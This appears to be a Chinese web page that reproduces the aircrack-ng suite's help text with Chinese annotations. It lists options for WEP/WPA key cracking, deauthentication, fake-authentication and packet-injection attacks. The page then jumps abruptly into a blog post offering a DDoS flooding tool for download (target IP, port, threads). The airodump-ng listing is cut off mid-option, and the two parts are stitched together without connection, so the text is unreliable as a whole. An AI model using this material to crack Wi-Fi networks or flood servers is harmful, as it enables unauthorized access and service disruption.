-d : use masking of the key (A1:XX:CF:YY) //使用密钥掩码,就是用户提供密钥片段
-m : MAC address to filter usable packets //MAC地址用以过滤掉无用数据包
-n : WEP key length : 64/128/152/256/512 //WEP密钥长度:64/128/152/256/512
-i : WEP key index (1 to 4), default: any //WEP密钥索引(1至4),缺省值:任何
-f : bruteforce fudge factor, default: 2 //穷举猜测因子,缺省值:2
-k : disable one attack method (1 to 17) //取消Korek的某一种攻击方法(1到17)
-x or -x0 : disable bruteforce for last keybytes //取消最后一个密钥字节的穷举
-x1 : last keybyte bruteforcing (default) //最后一个密钥字节进行穷举(缺省)
-x2 : enable last 2 keybytes bruteforcing //设置最后两个密钥字节进行穷举
-y : experimental single bruteforce mode //实验性的单一穷举模式
-K : use only old KoreK attacks (pre-PTW) //只是用旧KoreK攻击(Pre-PTW方式)
-s : show the key in ASCII while cracking //P解时显示密钥的ASCII值
-M : specify maximum number of IVs to use //指定最大使用的IVs(初始向量)
-D : WEP decloak, skips broken keystreams //WEP伪装,跳过坏掉的密钥流
-P : PTW debug: 1: disable Klein, 2: PTW //PTW排错:1:取消Klein(方式),2:PTW
-1 : run only 1 try to crack key with PTW //只运行一次尝试用PTWP解密钥

WEP and WPA-PSK cracking options: //WEP和WPA-PSKP解选项
-w : path to wordlist(s) filename(s) //字典文件路径
-r : path to airolib-ng database //airolib-ng数据库路径,不能和-w选项同时用
(Cannot be used with -w)

--help : Displays this usage screen //显示这个帮助界面

2.Airdecap-ng
decrypts WEP/WPA capture files. Part of the aircrack suite.
解密抓到的WEP/WPA数据包,是AirCrack(工具)组的一部分. //将数据包解密后可以看到明文,查找关键信息
Airdecap-ng 1.0 r1645 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe
Original work: Christophe Devine

http://www.aircrack-ng.org

usage: airdecap-ng [options] 使用方法: airdecap-ng [选项]

Common options: //命令选项
-l : don't remove the 802.11 header //不要去除802.11头部
-b : access point MAC address filter //AP的MAC地址用以过滤
-e : target network SSID //目标网络SSID(如TP-LINK)

WEP specific option: //WEP特殊选项
-w : target network WEP key in hex //目标网络十六进制WEP密钥

WPA specific options: //WPA特殊选项
-p : target network WPA passphrase //目标网络WPA密码
-k : WPA Pairwise Master Key in hex //WPA十六进制成对主密钥(PMK)

--help : Displays this usage screen //显示这个帮助界面

3.Aireplay-ng
802.11 packet injection program. Part of the aircrack suite.
802.11数据包注入程序.是AirCrack(工具)组的一部分.
Aireplay-ng 1.0 r1645 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe
Original work: Christophe Devine

http://www.aircrack-ng.org

usage: aireplay-ng

使用方法: aireplay-ng <选项> <重放攻击接口>

Filter options: //过滤器选项
-b bssid : MAC address, Access Point //AP的MAC地址
-d dmac : MAC address, Destination //目标MAC地址
-s smac : MAC address, Source //源MAC地址
-m len : minimum packet length //数据包最小长度
-n len : maximum packet length //数据包最大长度
-u type : frame control, type field //帧控制,type域
-v subt : frame control, subtype field //帧控制,subtype域
-t tods : frame control, To DS bit //帧控制,ToDS位
-f fromds : frame control, From DS bit //帧控制,FromDS位
-w iswep : frame control, WEP bit //帧控制,WEP位
-D : disable AP detection //取消AP探测

Replay options: //重放攻击选项
-x nbpps : number of packets per second //每秒发送数据包数
-p fctrl : set frame control word (hex) //设置帧控制字(十六进制)
-a bssid : set Access Point MAC address //设置AP的MAC地址
-c dmac : set Destination MAC address //设置目标MAC地址
-h smac : set Source MAC address //设置源目标MAC地址
-g value : change ring buffer size (default: 8) //改变环形缓冲区大小(缺省值:8)
-F : choose first matching packet //选择第一个匹配的数据包

Fakeauth attack options: //伪连接攻击选项
-e essid : set target AP SSID //设置目标AP的SSID(如TP-LINK)
-o npckts : number of packets per burst (0=auto, default: 1) //每组数据包数(0为自动,缺省值:1)
-q sec : seconds between keep-alives //发送keep-alives包的间隔时间
-y prga : keystream for shared key auth //共享密钥认证的密钥流
-T n : exit after retry fake auth request n time //当重复尝试n次伪连接失败后退出

Arp Replay attack options: //Arp重放攻击选项
-j : inject From DS packets //从DS数据包注入

Fragmentation attack options: //碎片攻击选项
-k IP : set destination IP in fragments //设置碎片里的目标IP
-l IP : set source IP in fragments //设置碎片里的源IP

Test attack options: //测试攻击选项
-B : activates the bitrate test //激活比特率(码率)测试

Source options: //源选项
-i iface : capture packets from this interface //从指定接口里抓取数据包
-r file : extract packets from this pcap file //从指定pcap文件里提取数据包

Miscellaneous options: //其他选项
-R : disable /dev/rtc usage //取消/dev/rtc的使用

Attack modes (numbers can still be used): //攻击模式(数字仍然可以使用)
--deauth count : deauthenticate 1 or all stations (-0) //解除一个或者全部站的连接
--fakeauth delay : fake authentication with AP (-1) //对AP进行伪连接攻击
--interactive : interactive frame selection (-2) //交互注入攻击
--arpreplay : standard ARP-request replay (-3) //标准Arp请求包重放攻击
--chopchop : decrypt/chopchop WEP packet (-4) //解码或断续WEP数据包攻击
--fragment : generates valid keystream (-5) //产生合法密钥流
--caffe-latte : query a client for new IVs (-6) //向一个客户端查询新IV(初始向量)
--cfrag : fragments against a client (-7) //对一个客户端的片段
--test : tests injection and quality (-9) //测试注入和质量

--help : Displays this usage screen //显示这个帮助界面

4.Airmon-ng
a utility to check an wifi interfaces status and placing the interface into monitor mode. Part of the aircrack suite.
一个用来检查wifi接口状态和更改接口进入监控模式的工具.是AirCrack(工具)组的一部分.
usage: airmon-ng [channel or frequency]
使用方法: airmon-ng <接口> [信道或频率]

5.Airodump-ng
802.11 packet capture program. Part of the aircrack suite.
802.11数据包抓包程序.是AirCrack(工具)组的一部分.
Airodump-ng 1.0 r1645 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe
Original work: Christophe Devine

http://www.aircrack-ng.org

usage: airodump-ng
[,,...]
使用方法: airodump-ng <选项> <接口>[,<接口>,...]

Options: //选项
--ivs : Save only captured IVs //只保存初始向量数据包
--gpsd : Use GPSd //使用GPSd
--write : Dump file prefix //转储文件名前缀
-w : same as --write //和--write相同
--beacons : Record all beacons in dump file //在转储文件里记录所有信标
--update : Display update delay in seconds //显示校正延迟时间
--showack : Prints ack/cts/rts statistics //显示ack,cts,rts统计
-h : Hides known stations for --showack //对--showack命令隐藏已知站点
-f : Time in ms between hopping channels //跳跃信道的时间,毫秒表示
--berlin : Time before removing the AP/client //从屏幕移除AP或客户端的时间
from the screen when no more packets//当没有收到更多数据包的时候
are received (Default: 120 seconds) //缺省值是120秒
-r : Read packets from that file //从指定文件中读取数据包
-x : Active Scanning Simulation //模拟主动扫描
--output-format

点击↑小图放大

效果没有下面那个PHP的明显。
既然群里面的朋友要，也放出来吧。
使用方法：填写IP地址 端口 线程 AddtoAttack
有朋友说看不懂，我囧，英文在稀烂，猜也猜的到这几个功能。

下载地址：

点击下载

相关文章

• 2010年06月23日 -- 分享国外一个PHP DDOS的脚本
• 2010年06月13日 -- Linux下压力测试综合对比
• 2009年09月23日 -- 应对服务器被DDOS攻击的紧急措施
• 2008年10月30日 -- ASPXshell MS08-067插件
• 2008年10月10日 -- ScanWriterable.aspx扫描权限
• 2008年06月28日 -- ddos原理
• 2007年11月19日 -- 反黑经验：深入了解 DDoS与 DDoS追踪
• 2007年03月13日 -- 因特网根服务器成功经受住2月DDOS攻击
• 2006年11月11日 -- 10月28号安全焦点DDOS事件背后内幕串串烧
• 2006年09月25日 -- 分布式拒绝攻击(DDOS)软件tfn2k攻防